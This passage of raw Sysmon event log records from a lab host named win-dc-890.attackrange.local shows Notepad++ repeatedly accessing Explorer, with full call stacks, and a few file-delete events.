YSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.739{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001046474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.739{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001046473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.738{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8 10341000x80000000000000001046472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.738{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001046470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001046469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.658{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+1746d2|C:\Windows\System32\windows.storage.dll+174ba6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x80000000000000001046466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1747e9|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+174765|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f 10341000x80000000000000001046463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e 10341000x80000000000000001046462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.474{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+c5d7a|C:\Windows\System32\SHELL32.dll+84ae4|C:\Windows\System32\SHELL32.dll+8236b|C:\Windows\System32\SHELL32.dll+81e4d|C:\Windows\System32\SHELL32.dll+a2589|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program 
Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686|C:\Program Files\Notepad++\notepad++.exe+1f2c8a|C:\Program Files\Notepad++\notepad++.exe+1e001c|C:\Program Files\Notepad++\notepad++.exe+1e3f1b|C:\Program Files\Notepad++\notepad++.exe+1defd1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 10341000x80000000000000001046461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.474{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+c5d68|C:\Windows\System32\SHELL32.dll+84ae4|C:\Windows\System32\SHELL32.dll+8236b|C:\Windows\System32\SHELL32.dll+81e4d|C:\Windows\System32\SHELL32.dll+a2589|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686|C:\Program Files\Notepad++\notepad++.exe+1f2c8a|C:\Program Files\Notepad++\notepad++.exe+1e001c|C:\Program Files\Notepad++\notepad++.exe+1e3f1b|C:\Program Files\Notepad++\notepad++.exe+1defd1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7 10341000x80000000000000001046460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.474{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+c5d68|C:\Windows\System32\SHELL32.dll+84ae4|C:\Windows\System32\SHELL32.dll+8236b|C:\Windows\System32\SHELL32.dll+81e4d|C:\Windows\System32\SHELL32.dll+a2589|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686|C:\Program Files\Notepad++\notepad++.exe+1f2c8a|C:\Program Files\Notepad++\notepad++.exe+1e001c|C:\Program Files\Notepad++\notepad++.exe+1e3f1b|C:\Program Files\Notepad++\notepad++.exe+1defd1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 23542300x80000000000000001046459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.458{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=BEF5780075A37A08085079D09E4D8F96,SHA256=708EFF44DD8417FEEE5FAF6AA9553038A7ECC3E9F14BC66A503FD0FAEDA1AB21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.789{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
